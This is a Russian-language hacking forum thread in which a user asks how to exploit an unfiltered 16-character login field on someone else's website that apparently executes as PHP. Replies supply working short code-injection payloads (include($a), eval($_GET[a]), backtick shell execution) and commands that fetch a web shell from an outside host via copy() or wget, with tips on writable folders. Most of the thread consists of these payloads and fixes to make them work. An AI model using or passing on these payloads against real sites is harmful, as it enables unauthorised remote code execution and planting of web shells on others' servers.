16 символов :(

Discussion in 'Песочница' started by Mr.Hardwar, 6 Jul 2009.

  1. Mr.Hardwar

    Mr.Hardwar New Member

    Joined:
    20 Sep 2008
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    На одном ресе обнаружил такую штуку: когда входишь на сайт то на странице пишется "Привет ЛОГИН". так вот, при регистрации в поле логин никакой фильтрации нет и можно указывать любые символы. Облом лишь в том что обработчик формы не регает логины больше 16 символов! :mad:

    Подскажите как можно использовать эту уязвимость. работает phpinfo() sleep(), а больше не хватает у меня ни фантазии ни символов
     
  2. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    При register_globals=ON
    PHP:
    include($a)
    Потом в GET['a'] - путь к шеллу
     
    1 person likes this.
  3. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    PHP:
    include($_GET['a'])
    Вроде же.
    Что то я непробывал просто так присваивать массиву из ниоткуда, что бы он брал из GET запроса.
    Или я видимо ещё незнал об этом.
    Если твой пример правильный, дико извеняюсь ;)
     
  4. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    какбе
     
  5. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    eval($_GET[a]); &a=copy('http://shellsite.com/shell.txt','shell.php'); ну в этом стиле.
     
  6. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    include($_GET['a']) - больше 16 какбе
    регистер глобалс по дефолту включён какбе
     
  7. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    включен на таких версиях старых что поискать надо:
     
  8. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    чёта у меня в на локалхосте по дефолту он был, пшп 5
     
  9. Fata1ex

    Fata1ex Elder - Старейшина

    Joined:
    12 Dec 2006
    Messages:
    703
    Likes Received:
    300
    Reputations:
    38
    По дефолту уже давно офф, а в шестой версии вроде и вовсе отключат.
     
    1 person likes this.
  10. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    МБ сам включил и подзабыл(бывает такое дистр сохранил и прям в нем поизменял) ну или в денвер/xamp/прочая нежить был поставлен в on а так с 4.2.0 в офф он по дефолту.
     
    1 person likes this.
  11. Mr.Hardwar

    Mr.Hardwar New Member

    Joined:
    20 Sep 2008
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    <?eval($_GET[a])?> получается больше 16-ти символов, а
    <?eval($a)?> и <?include($a)?> ничо не инклудят, ни локальные файлы ни с других хостов. (в адр строку добавляю &a=mysite.ru/file.txt)
    Это значит конец? 16 символов мало :(
     
  12. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    http://mysite.ru/file.txt
    По твоему запросу он инклюдит папку mysite.ru/file.txt а не удалённый сервер ;)
     
  13. Mr.Hardwar

    Mr.Hardwar New Member

    Joined:
    20 Sep 2008
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    c http результат тот же(
    &a=http://mysite.ru/primer.php -выводится страница c Hacking attempt!

    &a=http://mysite.ru/primer.txt -страница грузится но ничо не инклудится..пишется "Привет, !"
     
    #13 Mr.Hardwar, 9 Jul 2009
    Last edited: 9 Jul 2009
  14. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Инклюдить он заинклюдить
    Ну вот может бред.
    в .htacces
    На своём серваке.
     
  15. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    8 байт <? `$a`;
    14 байт <? `$_GET[a]`;
     
    1 person likes this.
  16. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,193
    Reputations:
    430
    Я тоже вчера пробовал... а дальше чего? ;)
     
  17. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Что значит "а дальше чего"? Дальше сливаем wget'ом и ему подобными шелл, наслаждаемся.

    ?a=wget+http://google.com/shell.txt если уж совсем не понятно.
     
  18. .::BARS::.

    .::BARS::. Elder - Старейшина

    Joined:
    13 Oct 2007
    Messages:
    379
    Likes Received:
    45
    Reputations:
    10
    хм.... а ничего если упапки нет прав на запись???? =))))
     
  19. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    А тебя совершенно не волнует тот факт, что папок все же больше одной? --output-document=
     
    1 person likes this.